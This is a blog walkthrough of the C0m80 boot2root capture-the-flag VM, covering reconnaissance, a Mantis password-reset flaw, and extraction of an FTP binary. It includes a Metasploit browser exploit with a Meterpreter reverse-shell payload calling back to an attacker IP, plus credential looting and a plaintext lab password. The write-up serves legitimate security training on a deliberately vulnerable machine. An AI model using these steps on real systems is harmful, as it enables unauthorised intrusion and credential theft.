Hacking Articles|Raj Chandel's Blog: Hack the C0m80 VM (Boot2root Challenge)

Hello friends! Today we are going to take another CTF challenge known as C0m80. The credit for making this vm machine goes to “3mrgnc3” and it is another boot2root challenge in which our goal is to get root to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.127 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap –A –p- 192.168.1.127

We find that port 80, 111, 139, 445, 2049, 20021, 37196. 40325, 41605, 49418, 58563 are open. As port 80 is running http we open the ip address in our browser.

We don’t find anything on the web page so we use dirb to enumerate the directories.

dirb http://192.168.1.127

We find a link to a login page that is running mantis bug report. We find that the version is vulnerable; we can reset the password of the users with this vulnerability. You can read how to exploit this vulnerability here.

Now we exploit this vulnerability to change the password of the users.

We can change password of all the users present just by changing the id. After changing all the password we find that alice(id=4) is the only account with administrative privileges.

Going the mails we find a page that contains a link to a backup file.

We download the backup file using wget to get more information about the file.

After downloading the backup file we find that it is a hexdump, we use this program here, to convert it to bin format.

Then we use binwalk to check for for embedded file and binaries and find that there are 2 binaries.

binwalk ftp.bin

We use dd to convert the files into exe and dll, so that we can run the program.

Now we run the program and find it’s a program for ftp server.

We use netstat to check of ports, and found that port 20021 opened for listening on our system.

netstat -antp

We use netcat to connect to the system and find that indeed it is an application for ftpserver.

We now reverse engineer the exe file using ollydbg for more information. And find that when it reads http: it opens the link in the the browser.

We use browser autopwn scanner to search for vulnerabilities on the server.

So we setup our listener on metasploit.

msf > use exploit/multi/browser/firefox_proto_crmfrequest

msf exploit(multi/handler) > set lhost 192.168.1.130

msf exploit(multi/handler) > set lport 4444

msf exploit(multi/handler) > set target 1

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > run

Now we copy the link given by metasploit and use it in the ftp server running on the target machine.

As soon as we run the command we get our reverse shell.

Going through the files we get a hint of file that contains all the passwords.

So we use the search command to find all the files with that name on the server.

We download the file on our server.

Now we open the file and find all the passwords.

Now as the author of the machine states that we can directly access the machine, we go to the server and use the password we find for rdp.

Now we have access to the machine we find a ssh private key but our nmap scan showed no ssh service running on the server so we take a look at the ssh configuration files and find that the ssh only accepts local connections on port 65122

Now we use the private key we find to login as al1ce, as it is the other account used on this server.

When we try to login through ssh using the key. We use plink to connect, we get a prompt to unlock the key we use the password we find al1ce (7M6Kt8tC8X5Qz99@Eeb8592Z$Fd@u286) and unlock the private key.

plink –l al1ce localhost –I id_rsa –P 65122